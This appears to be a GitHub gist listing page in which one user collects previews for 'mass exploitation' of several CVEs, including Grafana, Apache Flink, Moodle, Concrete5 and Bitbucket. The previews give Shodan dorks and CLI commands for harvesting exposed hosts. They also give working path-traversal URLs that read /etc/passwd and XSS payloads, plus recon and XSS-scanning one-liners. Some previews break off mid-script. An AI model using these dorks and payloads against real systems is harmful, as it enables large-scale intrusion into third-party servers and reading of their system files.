Skip to content

Instantly share code, notes, and snippets.

View simrotion13's full-sized avatar

Simba Gill simrotion13

4 followers · 0 following
View GitHub Profile
@simrotion13
simrotion13 / CVE-2021-45232
Created January 6, 2022 14:27
Mass exploitation of Apache APISIX Dashboard Unauthorized Access Vulnerability (CVE-2021-45232)
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
Shodan Dork : title="Apache APISIX Dashboard"
run below command to get list of ip running apache apisix application
shodan search 'title="Apache APISIX Dashboard"' --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a temp.txt
@simrotion13
simrotion13 / CVE-2021-44228
Created January 6, 2022 14:32
Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Prerequiste
Docker must be install. Go to below link to see how to install docker on kali linux
https://youtu.be/xN2JGqiqgow
Steps
A) Download log4j vulnerable app from below github link
https://github.com/simrotion13/log4shell-vulnerable-app
@simrotion13
simrotion13 / CVE-2021-43798
Created January 6, 2022 14:33
Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL :
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Shodan Dork : http.title:"grafana"
@simrotion13
simrotion13 / CVE-2020-17519
Last active May 1, 2023 06:14
Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]
Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
Shodan Dork : 'Apache Flink'
Affected Version : 1.11.1 and 1.11.2
Vulnerable URL :
https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
@simrotion13
simrotion13 / Moodle XSS vulnerability
Last active January 6, 2022 14:38
Moodle XSS vulnerability
Shodan Dork : 'http.component:Moodle'
Vulnerable URL :
https://IP/mod/lti/auth.php?redirect_uri=javascript:alert(document.domain)
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download moodle http.component:Moodle'
@simrotion13
simrotion13 / Concrete5 CMS XSS vulnerability
Created January 6, 2022 14:38
Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download concrete5 'Set-Cookie: CONCRETE5'
@simrotion13
simrotion13 / mass-recon.sh
Created July 23, 2022 06:36
#!/bin/bash
filename=$1
resolversFile=$2
resultDir=~/recon/output
nucleiTmpDir=~/nuclei-templates
Header='User-Agent: Mozllla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKlt/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safarl/537.36'
nuclei -ut
for line in $(cat $1); do
@simrotion13
simrotion13 / get-shodan-favicon-hash.py
Last active March 16, 2023 22:46
#python3 need
#Install mmh3 by running command pip install mmh3
import mmh3
import requests
import codecs
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get('https://licious.in/favicon.ico', verify=False)
@simrotion13
simrotion13 / xss-one-liner
Last active March 16, 2023 22:45
#cat targets_urls.txt
http://testphp.vulnweb.com
## Command Line
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
#tool used
#https://github.com/jaeles-project/gospider
#https://github.com/tomnomnom/qsreplace
@simrotion13
simrotion13 / CVE-2022-36804
Last active September 22, 2022 17:14
Hi Guys..
Today We explore the Atlassian Bitbucket Command Injection Vulnerability(CVE-2022-36804)
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request
Shodan Dork : 'http.component:"BitBucket"'
Run below commands to download the results ( Shodan Premium API Key is needed )
shodan download bitbucket 'http.component:"BitBucket"' <--- This will download 1000 results